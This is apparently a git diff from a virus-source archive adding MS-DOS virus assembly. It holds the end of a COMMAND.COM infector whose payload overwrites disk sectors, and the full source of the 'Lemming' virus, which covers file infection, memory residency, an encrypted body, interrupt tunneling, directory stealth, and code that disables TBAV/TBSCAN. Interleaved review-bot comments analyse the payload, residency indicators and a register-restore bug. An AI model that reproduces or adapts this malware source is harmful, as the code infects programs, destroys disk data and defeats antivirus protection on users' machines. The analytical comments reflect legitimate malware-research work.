; Get displacement from initial jump + ADD AX,0103H ; Convert to address for COM file + MOV ENTPTR,AX ; Save file entry address + MOV DX,FILELN ; Get file length + SUB DX,OFFSET ENDADR ; Subtract length of virus + DEC DX ; ...and one more + MOV [DI],DX ; Put offset into jump instruction + XOR CX,CX ; Clear high offset for move + MOV AX,4200H ; Move file pointer function (start) + INT 44H ; DOS service (diverted INT 21H) + MOV AL,INFCNT ; Get infection count + PUSH AX ; Preserve infection count + MOV BYTE PTR INFCNT,0 ; Set infection count to zero + MOV CX,OFFSET ENDADR ; \ Get length of virus + INC CX ; / + XOR DX,DX ; Address start of virus + MOV AH,40H ; Write handle function + INT 44H ; DOS service (diverted INT 21H) + POP AX ; Recover infection count + MOV INFCNT,AL ; Restore original infection count + XOR CX,CX ; \ Address second byte of program + MOV DX,1 ; / + MOV AX,4200H ; Move file pointer function (start) + INT 44H ; DOS service (diverted INT 21H) + MOV AX,[DI] ; Get virus offset + ADD 
AX,OFFSET BP0180 ; Add entry point + SUB AX,3 ; Subtract length of jump instruction + MOV [DI],AX ; Replace offset + MOV DX,DI ; Address stored offset + MOV CX,2 ; Length to write + MOV AH,40H ; Write handle function + INT 44H ; DOS service (diverted INT 21H) + INC BYTE PTR INFCNT ; Increment infection count + CMP BYTE PTR INFCNT,4 ; Have we reached target? + JB BP0070 ; Branch if not + JMP BP0110 ; Trash disk + + ; Is disk A or B? + +BP0070: MOV BYTE PTR N_AORB,0 ; Set off "not A or B" switch + CMP BYTE PTR CURDSK,2 ; Is current disk A or B? + JB BP0080 ; Branch if yes + MOV BYTE PTR N_AORB,1 ; Set on "not A or B" switch +BP0080: MOV AH,3EH ; Close handle function + INT 44H ; DOS service (diverted INT 21H) + CMP BYTE PTR N_AORB,1 ; Is "not A or B" switch on? + JE BP0090 ; Branch if yes + JMP BP0160 ; Restore registers and terminate + + ; Disk not A or B + +BP0090: MOV BYTE PTR N_AORB,0 ; Set off "not A or B" switch + MOV BX,OFFSET PATHNM ; Address pathname + MOV AL,CURDSK ; Get current disk + ADD AL,'a' ; Convert to letter + MOV [BX],AL ; Store letter in pathname + MOV DX,BX ; Move pathname address + MOV AX,3D02H ; Open handle (R/W) function + INT 44H ; DOS service (diverted INT 21H) + JNB BP0100 ; Branch if no error + JMP BP0160 ; Restore registers and terminate + + ; Set infection count same as in current program + +BP0100: MOV BX,AX + MOV AX,4202H ; Move file pointer function (EOF) + XOR CX,CX ; \ No offset + MOV DX,CX ; / + INT 44H ; DOS service (diverted INT 21H) + MOV DX,AX ; \ Address back to infection count + SUB DX,7 ; / + MOV AX,4200H ; Move file pointer function (start) + INT 44H ; DOS service (diverted INT 21H) + MOV CX,1 ; Length to write + MOV DX,OFFSET INFCNT ; Address infection count + MOV AH,40H ; Write handle function + INT 44H ; DOS service (diverted INT 21H) + MOV AH,3EH ; Close handle function + INT 44H ; DOS service (diverted INT 21H) + JMP BP0160 ; Restore registers and terminate + + ; Trash disk + +BP0110: MOV AL,CURDSK ; Get current disk + 
CMP AL,2 ; Is disk A or B? + JNB BP0150 ; Branch if not + MOV AH,19H ; Get current disk function + INT 44H ; DOS service (diverted INT 21H) + MOV BX,OFFSET PATHNM ; Address pathname + MOV DL,[BX] ; Get drive letter from pathname + CMP DL,'A' ; Is drive letter 'A'? + JE BP0120 ; Branch if yes + CMP DL,'a' ; Is drive letter 'a'? + JE BP0120 ; Branch if yes + CMP DL,'b' ; Is drive letter 'b'? + JE BP0130 ; Branch if yes + CMP DL,'B' ; Is drive letter 'B'? + JE BP0130 ; Branch if yes + JMP BP0160 ; Restore registers and terminate + + ; Drive A + +BP0120: MOV DL,0 ; Set drive A + JMP BP0140 + + ; Drive B + +BP0130: MOV DL,1 ; Set drive B +BP0140: CMP AL,DL ; Is this the same as current? + JNE BP0150 ; Branch if not + JMP BP0160 ; Restore registers and terminate + + ; Write lump of BIOS to floppy disk + +BP0150: MOV SI,0FE00H ; \ Address BIOS (?) + MOV DS,SI ; / + MOV CX,0020H ; Write 32 sectors + MOV DX,1 ; Start at sector one + INT 26H ; Absolute disk write + POPF + MOV AH,9 ; Display string function + MOV DX,1840H + INT 44H ; DOS service (diverted INT 21H) +BP0160: POP DI + POP DX + POP CX + POP DS +BP0170: POP BX + POP AX + JMP CS:INT_21 ; Branch to original Int 21H + + ; Original Int 21H vector + +INT_21 EQU THIS DWORD + DW 138DH ; Int 21H offset + DW 0295H ; Int 21H segment + + ; Entry point for infected program + +BP0180: CALL BP0190 ; \ Get current address +BP0190: POP SI ; / + SUB SI,3 ; Address back to BP0180 + MOV BX,SI ; \ Address of virus start + SUB BX,OFFSET BP0180 ; / + PUSH BX ; Save address of virus start + ADD BX,OFFSET FILELN ; Address file length + MOV AH,19H ; Get current disk function + INT 21H ; DOS service + MOV [BX-1],AL ; Save current disk + MOV AX,[BX] ; Get file length + ADD AX,0100H ; Add PSP length + MOV CL,4 ; \ Convert to paragraphs + SHR AX,CL ; / + INC AX ; Allow for remainder + MOV BX,AX ; Copy paragraphs to keep + MOV AH,4AH ; Set block function + INT 21H ; DOS service + JNB BP0200 ; Branch if no error + JMP BP0220 ; Pass control to 
host + + ; Allocate memory for virus + +BP0200: MOV CL,4 ; Bits to move + MOV DX,OFFSET ENDADR ; Length of virus + SHR DX,CL ; Convert to paragraphs + INC DX ; Allow for remainder + MOV BX,DX ; Copy paragraphs for virus + MOV AH,48H ; Allocate memory function + INT 21H ; DOS service + JNB BP0210 ; Branch if no error + JMP BP0220 ; Pass control to host + + ; Install virus in memory + +BP0210: PUSH ES + PUSH AX ; Preserve allocated memory segment + MOV AX,3521H ; Get Int 21H function + INT 21H ; DOS service + MOV [SI-4],BX ; Save Int 21H offset + MOV [SI-2],ES ; Save Int 21H segment + POP ES ; Recover allocated memory segment + PUSH SI + SUB SI,OFFSET BP0180 ; Address back to start of virus + XOR DI,DI ; Target start of new area + MOV CX,OFFSET ENDADR ; \ Length of virus + INC CX ; / + REPZ MOVSB ; Copy virus to new area + POP SI + PUSH DS + MOV DX,[SI-4] ; Get Int 21H offset + MOV AX,[SI-2] ; \ Set DS to Int 21H segment + MOV DS,AX ; / + MOV AX,2544H ; Set Int 44H function + INT 21H ; DOS service + PUSH ES ; \ Set DS to ES + POP DS ; / + XOR DX,DX ; Interrupt 21H routine (BP0010) + MOV AX,2521H ; Set Int 21H function + INT 44H ; DOS service (diverted INT 21H) + POP DS + POP ES +BP0220: POP BX + PUSH ENTPTR[BX] ; Push COM file entry address + RET ; ...and return to it + +PATHNM DB 'b:\command.com', 0 ; Pathname +BUFFER DB 7FH, 58H, 0BH, 0, 0 ; Read buffer +ENTPTR DW 0CB0H ; File entry address +N_AORB DB 0 ; "Not A or B" switch +INFCNT DB 0 ; Infection count + DB 0 +CURDSK DB 0 ; Current disk +FILELN DW 5AAAH ; File length + DW 65A9H ; Infection indicator + +ENDADR EQU $-1 + +CODE ENDS + + END + +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + 
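Review bot: The trigger and payload at `BP0110`/`BP0150` need an explicit warning comment, because the Hirst header only says the listing is for researchers: once `INFCNT` reaches 4 (`CMP BYTE PTR INFCNT,4`), and either the disk current at load time is C: or higher or the current floppy differs from the drive of the COMMAND.COM just infected, the code points DS at 0FE00h and writes 32 sectors from there over logical sectors 1-32 of the drive in AL via `INT 26H` (typically the FATs and root directory), and the following `MOV AH,9` / `MOV DX,1840H` does not display a message so much as print whatever sits at 0FE00h:1840h. I'd put `; PAYLOAD: overwrites sectors 1-32 of drive AL with ROM contents (INT 26h); fires after 4 infections` above `BP0150`. Two detection-relevant facts are stated nowhere: the original INT 21h handler is re-installed as INT 44h (`MOV AX,2544H`) and every DOS call from the resident code goes through `INT 44H`, so an INT 44h vector pointing into the DOS kernel is a residency indicator; and `INT_21 DW 138DH` / `DW 0295H` is just the vector captured from the analysed sample, since install overwrites it at `MOV [SI-4],BX` / `MOV [SI-2],ES`, so it must not be used as a signature. Finally, the header's 'only to be made available ... on a need-to-know basis' notice conflicts with republishing the listing in an open corpus, which the commit does not address.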
diff --git a/MSDOS/Virus.MSDOS.Unknown.lemming.asm b/MSDOS/Virus.MSDOS.Unknown.lemming.asm new file mode 100644 index 00000000..1cd7a189 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.lemming.asm 
@@ -0,0 +1,1125 @@ +.286 +.model tiny +.code + +virus_size equ vir_end - start +virus_siz equ virus_size + virus_size +decrypt_size equ handle - next_function +data_size equ vir_end - step1 +engine_size equ next_function - start +Int21_base equ 021h*4 +timer_seg equ 01ch*4+2 +virus_paragraphs equ virus_size * 2/16 + +code segment + assume cs:code,ds:code,es:code + + +progr equ 0100h + org progr + +main: +start: + mov cx,decrypt_size + lea si,next_function + call ofset +ofset: pop bp + sub bp,109h ;Set postion of base pointer +decrypt: + xor byte ptr cs:[si][bp],00 ;Anti heuristic decryptor +key: ;will fool Thunderbyte. + jcxz next_function + dec cx + inc si + jmp decrypt + +fooled_tbav: + + +next_function: + push es + push ds + push cs + pop ds + call getcpu ;Detect CPU + je _8086 + mov ax,0fffeh ;Determine if installed + int 21h + cmp bx,0ffffh ;Returns ffff in bx if so... + +test_processor: + jne install__ +_8086: jmp end_install ;Not 80286 compatible + +transfer: + call get_int21 + mov di,0100h + push cs + pop ds + lea si,word ptr cs:start[bp] + mov cx,virus_size +move: + rep movsb ;Move virus and make resident + +copied: + + call set_int21 ;Set int 21 to virus + jmp end_install + +install__ proc near + push ds es + call anti_av ;Detect the presence of TBDRIVER + pop es ds ;and patch + mov ax,5802h ;are umb's available? + int 21h + jc install_low ;no then install in low memory + mov ax,5803h ;Chain mcb's into low memory + mov bx,1 + int 21h + jc install_low + push es ;get current mcb + pop dx + dec dx + mov di,3 ;add to current mcb to get + ;pointer to next mcb +walk: mov es,dx + cmp byte ptr es:[di-3],05ah + je lastmcb + add dx,word ptr es:di + inc dx ;search for last mcb. + mov es,dx + cmp byte ptr es:[di-3],05ah + jne walk +lastmcb: + mov ax,5803h ;remove umb link + xor bx,bx + int 21h + cmp word ptr es:[di],virus_paragraphs + ja hi_install ;Enough memory for UMB install? 
+ push cs + pop es + jmp install_low +hi_install: + inc dx + mov es,dx ;es points to virus new CS +install_low: + push es + xor di,di + push es ;original psp segment + pop dx + dec dx + mov es,dx + cmp byte ptr es:[di],5ah + jne end_install + mov ax,virus_siz + mov cl,4 + shr ax,cl + inc ax + inc ax + sub word ptr es:[di+3],ax ; + mov ax,word ptr es:[di+3] ;copy last mcb size into ax + pop cx + add cx,ax ;new segment + sub cx,10h + mov word ptr cs:new_seg[bp],cx + mov es,cx + jmp transfer ;go and move virus to new + ;memory position +install__ endp + +end_install: + pop ds + pop es + lea di,word ptr cs:buffer1[bp] + mov ax,05a4dh + cmp word ptr cs:[di],ax + jne goto_com + mov ax,word ptr cs:[di+16h] + push es + pop bx + + add bx,10h + add ax,bx ;code segment + + mov cx,word ptr cs:[di+0eh] ;get original ss + mov dx,word ptr cs:[di+10h] ;get original sp + add cx,bx + cli + mov ss,cx ;restore original ss and sp + mov sp,dx + sti + push ax + mov bx,word ptr cs:[di+14h] ;get original ip + push bx + call clear_reg ;clear all registers + retf ;and hand back control + +goto_com: + cld + lea si,buffer1[bp] ;restore com entry point + mov di,0100h + mov cx,18h + rep movsb + push 0100h + call clear_reg + ret ;hand back control + +clear_reg: + xor ax,ax + xor bx,bx + xor cx,cx + xor dx,dx + xor si,si + xor di,di + xor bp,bp + ret + +anti_av proc near +; DISABLE TBDRIVER AGAINST TUNNELING DETECT + + mov ax,5200h + int 21h ;es:bx + add bx,22h ;pointer to first device 'NUL' + ;or 'CON' +next_search: + cld + lds si,word ptr es:bx + cmp si,-1 + je not_found + push ds cs + pop es + lea di,scan[bp] + push si + add si,10 ;device name offset + ;from bx pointer + mov cx,5 + rep cmpsb ;search for device name + pop bx es + jne next_search +found: ;If TBDRIVER is found then + push ds ;patch against tunneling + pop es + push cs + pop ds + mov di,bx + xor ax,ax + lea si,scan_string[bp] +next_char: + inc ax + mov cx,5 + push si + rep cmpsb ;search for string + pop si + je bullseye + cmp 
ax,10116 + je not_found + jmp next_char + +bullseye: + mov es:[di-12],09090h ;disable tbdriver +not_found: + ret + scan db 'TBDRV' + scan_string db 0fah,09ch,0fch,053h,050h +anti_av endp + + +VirName db 0dh,0ah,'The Rise and Fall of ThunderByte-1994-Australia.',0dh,0ah + db ' You Will Never Trust Anti-Virus Software Again!! ',0dh,0ah + db '[LEMMING] ver .99á' + +Anti_tbscan proc near + + push es ds si di ax bx cx dx + push bx + lea si,Tbscan + lea bx,tbscan_size + mov byte ptr cs:no_scasb_flag,0 + call tbscan_test ;Is Tbscan being executed? + pop bx + jnc not_tbscan + push cs + pop ds + call hook_int1c ; + les di, dword ptr es:bx+2 + push di + xor bx,bx + mov bl, byte ptr es:[di] + add di,bx ;di now points to end of C/T + lea si,tbscan_switch + cld + movsw + movsw + pop di + add byte ptr es:[di],3 +not_tbscan: + pop dx cx bx ax di si ds es + ret +tbscan_size db 0,6,6,0 +tbscan_switch db 20h,'c','o',0dh ;adding ' co' to command line + ;forces tbscan into Compat + ;mode +Anti_tbscan endp + +get_int21 proc near + push es + push ds + xor bx,bx + mov ds,bx + mov bx,word ptr ds:[84h] + mov es,word ptr ds:[86h] + pop ds + mov word ptr cs:int_21_off[bp],bx ;save vector for later calls + mov word ptr cs:int_21_seg[bp], es + mov word ptr cs:int_21_off_o[bp],bx + mov word ptr cs:int_21_seg_o[bp],es + call int_trace + pop es + ret +get_int21 endp + +set_int21 proc near + push es + + xor ax,ax + mov ds,ax + lea ax,word ptr cs:int_21 + mov bx,word ptr cs:new_seg[bp] + cli + mov ds:[134],bx + mov ds:[132],ax + sti + pop es + ret +set_int21 endp + +identify proc near + + ;on entry, ds:dx points to asciiz file to be run. + ;bx must point to file size table. EOT must be '0' + ;si must point to table of strings to compare. + ;direction_flag==0 for before '. e.g lemming.com' and 1 for after. + + push ds ;pointers to asciiz + push dx + mov cx,00ffh + mov al,'.' 
+ push ds + pop es + push dx + pop di + cmp byte ptr cs:no_scasb_flag,1 + je no_scasb + cld + repne scasb +no_scasb: + xor ax,ax ;load index position (0). + xor cx,cx + push cs + pop ds +next_byte: + inc al + push ax + push di ;save position + push si + xlat + or al,al ;end of index? + jz no_match ;yes? + cmp byte ptr cs:direction_flag,1 + je right + sub di,8 ;back up to begining of name + cmp byte ptr cs:no_scasb_flag,1 + je right + add di,8 + sub di,ax + dec di +right: mov cl,al ;bytes to count... + rep cmpsb + je match_found + pop si + add si,ax ;if not equal, next field + pop di + pop ax + jmp next_byte + +match_found: + clc + jmp clear + +no_match: stc + +clear: pop ax + pop ax + pop ax + pop dx + pop ds + ret + + direction_flag db 0 + no_scasb_flag db 0 +identify endp + + +do_not_infect proc near ;Table of files not to infect +start_: + AVSize db 4,4,6,3,5,5,0 + AVName :db 'TBAV' + TBSCAN: db 'TBSCAN' + db 'NAV' + db 'VSAFE' + db 'FPROT' + +do_not_infect endp +is_file_infectable proc near + +extension_size db 4,3,3,3,3,0 ;Table of extensions to infect +extension: db 'COM' + db 'com' + db 'EXE' + db 'exe' +stop_: +is_file_infectable endp + +stealth_a proc near ;Appears to be the same DIR + pushf ;stealth routines from NPOX + push cs + call skip_infect + test al,al + jnz no + + push ax + push bx + push es + mov ah,51h + int 21h + + mov es,bx + cmp bx,es:[16h] + jnz not_ + mov bx,dx + mov al,[bx] + push ax + mov ah,2fh + int 21h + pop ax + inc al + + jnz fcb_ok + add bx,7h +fcb_ok: mov ax,es:[bx+17h] + + and ax,01eh + xor al,01eh + jnz not_ + and byte ptr es:[bx+17h],0e0h + sub word ptr es:[bx+1dh],virus_size + sbb word ptr es:[bx+1fh],0 +not_: pop es + pop bx + pop ax +no: iret +stealth_a endp + +search_flag_b: + mov byte ptr cs:trace_flag,0 ;re-use to save memory + jmp dta_out + +stealth_b proc near + pushf + push cs + call skip_infect + jc search_flag_b + mov byte ptr cs:trace_flag,1 + push ax + push bx + push es + mov ah,2fh + int 21h + + mov ax,es:[bx+16h] 
+ mov cx,es:[bx+18h] + and ax,1eh + xor ax,1eh + jnz dta_out1 + sub word ptr es:[bx+1ah],virus_size + sbb word ptr es:[bx+1ch],0 + +dta_out1: pop es + pop bx + pop ax +dta_out: retf 0002h + +stealth_b endp +stealth: jmp stealth_a + +critical_error_handler: + mov al,03h + iret + +int_21 proc near + cmp ah,011h + je stealth + cmp ah,012h + je stealth + cmp ah,04eh + je stealth_b + cmp ah,04fh + je stealth_b + cmp ah,04bh + je file_infect_step + cmp ah,06ch + je disinfect_step + cmp ah,03dh + je disinfect_step + cmp ah,03eh + je file_infect + cmp ah,04ch + je program_terminate_step + cmp ax,0fffeh ;test if active in memory + jne direct + mov bx,0ffffh + iret + + direct: jmp dword ptr cs:int_21_off + +program_terminate_step: + call program_terminate + jmp direct + +disinfect_step: jmp disinfect + +file_infect_step: + call anti_tbscan + jmp file_infect +int_21 endp + + + +get_filename_from_handle proc near + + push bx + mov ax,1220h + int 2fh + mov ax,1216h + mov bl,es:[di] + int 2fh + pop bx + add di,11h + mov byte ptr es:[di-0fh],02 + add di,17h + push di + pop dx + push es + pop ds + ret +get_filename_from_handle endp + +infect_OK proc near + + lea bx,extension_size + lea si,extension ;Test for EXE,COM,OVL + mov byte ptr cs:direction_flag,1 + call identify + jc error ;if not exe then error + + lea bx,avsize + lea si,avname ;Test for AV +tbscan_test: + mov byte ptr cs:direction_flag,0 + call identify + jnc error ;If no AV then good! 
+ +no_error: + clc + ret + +error: stc + ret + +infect_ok endp + +no_good: + jmp exe + +file_infect proc + cmp bl,4 + ja handle_ok + cmp ah,4bh ;determine if file open or + je handle_ok ;file execute + jmp skip_infect +handle_ok: + push ax + push bx + push es + push bx + push cx + push dx + push ds + push di + push si + + call set_critical_error_handler + cmp ah,4bh + jne only_handle_supplied + + call open_file ;open file if call = ah=4b + jc no_good + cmp bl,5 + jb no_good + mov byte ptr cs:execute_flag,1 + + push bx + mov byte ptr cs:no_scasb_flag,0 + call infect_ok + pop bx + jnc skip_flag_check + jmp dont_infect_here + +only_handle_supplied: + + mov byte ptr cs:execute_flag,0 ;if flag ==1 then close + call get_filename_from_handle + + + push bx + mov byte ptr cs:no_scasb_flag,1 + call infect_ok + pop bx + + jnc good + jmp dont_infect_here + +skip_flag_check: + +good: call get_date + push dx + push cx + mov word ptr cs:old_date,dx + mov word ptr cs:old_time,cx + call is_file_infected + jc do_it + jmp loc_15 + +do_it: call set_offset_start + push cs + pop ds + lea dx,buffer + mov cx,18h + call read_file + push cx + + cld + push cs + pop es + lea si,buffer + lea di,buffer1 + mov cx,18h + rep movsb ;Save header for stealth + pop cx ;disinfect on open + cmp word ptr cs:[buffer1+0ch],1 ;Dont infect if number of + jb exe ;paragraps required after load + xor dx,dx ;is less than 1 + call set_offset_e + cmp dx,0 + ja big_enough + cmp ax,0fff0h-virus_siz + ja exe + +big_enough: + cmp dx,4 + ja exe + cmp byte ptr ds:[buffer],4Dh ; 'M' ; is file exe? 
+ je file_is_exe ; Jump if equal; + jmp file_is_com +exe: + jmp loc_15 + +file_is_exe: ;Recalculate new EXE Header + push bx + mov cl,4 + mov bx,word ptr [buffer+8] + shl bx,cl + push dx ax + sub ax,bx + sbb dx,0 + mov bx,10h + div bx + mov word ptr [buffer+14h],dx + mov word ptr [buffer+16h],ax + add ax,virus_size/16 + mov word ptr [buffer+0eh],ax + pop ax dx + add ax,virus_size + adc dx,0 + mov bx,512 + div bx + pop bx + inc ax + mov word ptr [buffer+4],ax + mov word ptr [buffer+2],dx + mov cx,18h + lea dx,buffer + push dx + push cx + jmp short loc_14 + +File_Is_Com: + sub ax,3 + mov word ptr cs:[com_header_offset],ax + mov cx,3 ;header size in bytes + lea dx,com_header + push dx + push cx +loc_14: + + call write_virus ;write and encrypt virus + call set_offset_start + pop cx + pop dx + call write_bytes + pop cx + or cl,01eh + push cx + +loc_15: + pop cx + pop dx + call write_date + +dont_infect_here: + cmp byte ptr cs:execute_flag,1 + jne dont_close + mov ah,3eh + call dos +dont_close: + call restore_critical_error_handler + pop si + pop di + pop ds + pop dx + pop cx + pop bx + pop es + pop bx + pop ax + +skip_infect: + jmp dword ptr cs:int_21_off + +execute_flag db 0 + +file_infect endp + +disinfect proc near + pusha + push ds es + cmp ah,06ch ;adjust ds:si to ds:dx if + jne not_extended ;ah == extended file open(6c) + push si + pop dx +not_extended: + mov byte ptr cs:no_scasb_flag,0 + call infect_ok + jc skip_disinfect + call set_critical_error_handler + call open_file + jc skip_disinfect ;Skip disinfection on error + push cs + pop ds + + call get_date ;Get file date + call is_file_infected ;Is the seconds field 60? 
+ jne dont_disinfect ;If not, then quit + xor dx,dx + call set_offset_e ;get infected file size + push dx ;save + push ax + sub ax,1ch ;sub buffer size from end + sbb dx,0 + mov cx,dx ;set new pointer to buffer + mov dx,ax + call no_xor + lea dx,old_date + mov cx,1ch ;buffer = 18h + 4 for date = 1c + call read_file ;read into buffer + call set_offset_start ;Restore original header + mov cx,18h + lea dx,buffer1 + call write_bytes ;write at start + pop dx + pop cx + sub dx,virus_size + sbb cx,0 + call no_xor ;set offset from start + mov ah,40h + xor cx,cx + call dos ;truncate + mov cx,old_time + mov dx,old_date + call write_date ;Restore original date and time + cmp trace_flag,0 + je dont_disinfect + call reset_dta ;Adjust seconds field in DTA +dont_disinfect: + mov ah,3eh ;Close file + call dos + call restore_critical_error_handler +skip_disinfect: + pop es ds + popa + jmp dword ptr cs:int_21_off + +disinfect endp + +reset_dta proc near + push ax bx es + mov ah,2fh ;Get current DTA + call dos ;DTA pointed to by es:bx + mov ax,word ptr cs:old_time ;Get old time and + mov word ptr es:[bx+16h],ax ;save in DTA + pop es bx ax + ret +reset_dta endp + +get_date proc near + mov ax,5700h + call dos + ret +get_date endp + +write_date proc near + mov ax,5701h + call dos + ret +write_date endp + +is_file_infected proc near + and cl,01eh ;Unmask seconds + cmp cl,01eh + ret +is_file_infected endp + +com_header proc + db 0e9h ;JMP +com_header_offset dw 0000 +com_header endp + + +set_offset_start proc + xor cx,cx + xor dx,dx +no_xor: mov ax,4200h + call dos + ret + +set_offset_e: + xor cx,cx + mov ax,4202h + call dos + ret +read_file: + mov ah,3fh + call dos + ret +write_bytes: + mov ah,40h + call dos + ret + +write_virus: + xor ax,ax + out 70h,al + in ax,70h ;Get seconds from computer + cmp ah,0 ;If seconds = 0 then + jne dont_mask ;set to 12 + mov ah,12 + +dont_mask: + cmp ah,21h ;??? 
+ jne dont_mask1 + mov ah,15h + +dont_mask1: + mov byte ptr cs:key-1,ah ;Save key in virus decryptor + lea si,start ;move to preallocated memory for + lea di,vir_end ;encryption + inc di + mov cx,virus_size + cld + rep movsb ;Copy uninfected verson to + ;encryption area + mov cx,decrypt_size + lea si,vir_end ;load si with virus and address + inc si ;inc to virus image to encrypt + add si,engine_size ;add 16h bytes so as not to +encrypt: ;encrypt virus engine + xor [si],ah + inc si + loop encrypt ;Encrypt + + mov ah,40h + mov cx,virus_size + lea dx,vir_end + inc dx + call dos + ret +set_offset_start endp + +dos proc near + Pushf ;Save flags for DOS IRET + call dword ptr cs:int_21_off_o ;original dos entry + ret +dos endp + +open_file proc near + push ax + mov ax,3d02h + call dos + push ax + pop bx ax ;Put handle into BX + ret +open_file endp + +set_critical_error_handler proc near + push ax bx dx es ds + push cs + pop ds + mov ax,3524h + call dos + mov critical_error_seg,es + mov critical_error_off,bx + lea dx,critical_error_handler + mov ax,2524h + call dos + pop ds es dx bx ax + ret +set_critical_error_handler endp + +critical_error_off dw ? +critical_error_seg dw ? 
+ +restore_critical_error_handler proc near + mov ax,2524h + lds dx,dword ptr cs:critical_error_off + call dos + ret +restore_critical_error_handler endp + + +int_trace proc near + mov ax,3501h ;get trace interrupt + int 21h + mov di,es ;save seg and offset in di, si + mov si,bx + + mov ax,2501h + lea dx,word ptr cs:int_01[bp] ;point trace to our segment + int 21h + pushf + push cs + lea ax,word ptr cs:exit_trace[bp] ;set up for after trace + push ax + + cli + pushf + pop ax + or ax,100h ;switch trace flag on + push ax ;save flags + + mov ax,word ptr cs:int_21_seg[bp] + push ax ;save seg + mov ax,word ptr cs:int_21_off[bp] + push ax ;save offset + mov ax,351ch ;get INT 1c address + mov byte ptr cs:trace_flag[bp],1 + mov bx,bp + iret +exit_trace: + mov byte ptr cs:trace_flag[bp],0 ;turn of our trace flag + sti ;restore interrupts + mov ax,2501h ;restore original INT 01 + mov dx,si ;Vectors + mov ds,di + int 21h + ret ;Done +int_01: + push bp + mov bx,bp + mov bp,sp + cmp byte ptr cs:trace_flag[bx],1 + je tunnel_dos +tunnel: + and word ptr [bp+6],0feffh + mov byte ptr cs:trace_flag[bx],0 + pop bp + iret +tunnel_dos: + cmp word ptr [bp+4],300h ;Are we in the DOS SEG? 
+ jb save_vector + pop bp + iret + +save_vector: + push cx + mov cx,[bp+2] + mov cs:int_21_off_o[bx],cx ;Delta offsets are used + mov cx,[bp+4] + mov cs:int_21_seg_o[bx],cx + pop cx + jmp tunnel + +int_trace endp + +program_terminate proc near + cmp byte ptr cs:tbexecute_flag,0 + je tbscan_exit + mov byte ptr cs:tbexecute_flag,0 ;Turn off tbscan execute + mov byte ptr cs:done_flag,0 ;flag + call unhook_1c ;Restore int 1C +tbscan_exit: + ret +program_terminate endp + +hook_int1c proc near + pusha + push es ds + mov ax,0351ch + call dos + mov int_1c_off,bx + mov bx,es + mov int_1c_seg,bx + lea dx,int1c + mov ah,025h + call dos + mov tbexecute_flag,1 + pop ds es + popa + ret +hook_int1c endp + +int1c proc near + cmp byte ptr cs:done_flag,1 + je exit_1c + cmp byte ptr cs:tbexecute_flag,1 + jne exit_1c + call convert_tbscan ;Patch TBSCAN with 'OWN' +exit_1c: + jmp dword ptr cs:int_1c_off +int1c endp + +unhook_1c proc near + pusha + push es ds cs + pop ax ;ax= code seg + xor bx,bx + mov es,bx ;es= 0000h + push es + mov bx,word ptr es:timer_seg + mov es,bx + cmp bx,ax + jne dont_unhook + mov ax,word ptr cs:int_1c_seg + mov bx,word ptr cs:int_1c_off + pop es + cli + mov word ptr es:timer_seg,ax + mov word ptr es:timer_seg-2,bx + sti +dont_unhook: + pop ds es + popa + ret +unhook_1c endp + +convert_tbscan proc near + pusha + push es ds cs + pop ax + xor bx,bx + mov es,bx + mov bx,word ptr es:timer_seg ;Trace through INT 1c which is + mov di,word ptr es:timer_seg-2 ;hooked by TBSCAN + mov es,bx + cmp bx,ax + je exit_convert + xor ax,ax + lea si,replace + push cs + pop ds +next_char2: + inc ax + mov cx,8 + push si + rep cmpsb ;search for string 'DOS','OWN' + pop si ;within TBSCAN while it is in + je found_dos ;memory doing it's thing. 
+ cmp ax,0fffeh + je exit_convert + jmp next_char2 + +found_DOS: + push es + pop ds + sub di,8 + mov si,di + add si,4 + mov cx,3 + rep movsb + mov byte ptr cs:done_flag,1 +exit_convert: + pop ds es + popa + ret + + ; Search Data +replace db 'DOS',0,'OWN',0 +done_flag db 0 +convert_tbscan endp + +Getcpu proc near ;Test CPU Type + Pushf + Pop AX + Push AX + And AX,0FFFh + Push AX + Popf + Pushf + Pop AX + pop BX + And AX,0F000h + Cmp AX,0F000h + ret +getcpu endp + + +HANDLE: + +step1: +data proc near + db '=!Packed file is corruptœ' + buffer db 17h dup(?) ;Modified EXE and Com header + db 90h + tbexecute_flag db 0 + trace_flag db ? ;Used for tunneling + int_01_off dw ? + int_01_seg dw ? + int_1c_off dw ? + int_1c_seg dw ? + int_21_off_o dw ? ;Original INT 21 + int_21_seg_o dw ? + int_21_off dw ? ;Chained INT 21 + int_21_seg dw ? + new_seg dw ? + old_date dw ? + old_time dw ? + buffer1 db 90h ;Original file header for + mov ax,4c00h ;Com and Exe files + int 21h + db 11h dup(?) + db 90h + +data endp + +vir_end: +code ends + end main diff --git a/MSDOS/Virus.MSDOS.Unknown.lepc.asm b/MSDOS/Virus.MSDOS.Unknown.lepc.asm new file mode 100644 index 00000000..f23db2a8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.lepc.asm 
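Review bot: In `file_infect`, the `no_good` path (open failure or a handle below 5 after `call open_file`) jumps to `exe` and on to `loc_15`, which does `pop cx` / `pop dx` — but those two words are only pushed at `good:`, so on that path the restore sequence at `dont_infect_here` is two words off and, as far as I can trace the INT 21h frame, the last two pops consume the caller's return address before `jmp dword ptr cs:int_21_off`; `write_date` is also invoked there with whatever `open_file` left in `bx`. Worth recording at that label for anyone tracing the sample: `; NOTE: no_good reaches loc_15 before dx/cx are pushed at good: -- register restore is off by two words`. Separately, `set_int21` patches the vector through decimal `ds:[132]`/`ds:[134]` while `get_int21` reads `ds:[84h]`/`ds:[86h]`, and the file already defines `Int21_base equ 021h*4` without using it; `mov ds:[Int21_base+2],bx` / `mov ds:[Int21_base],ax` would make the intent visible.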
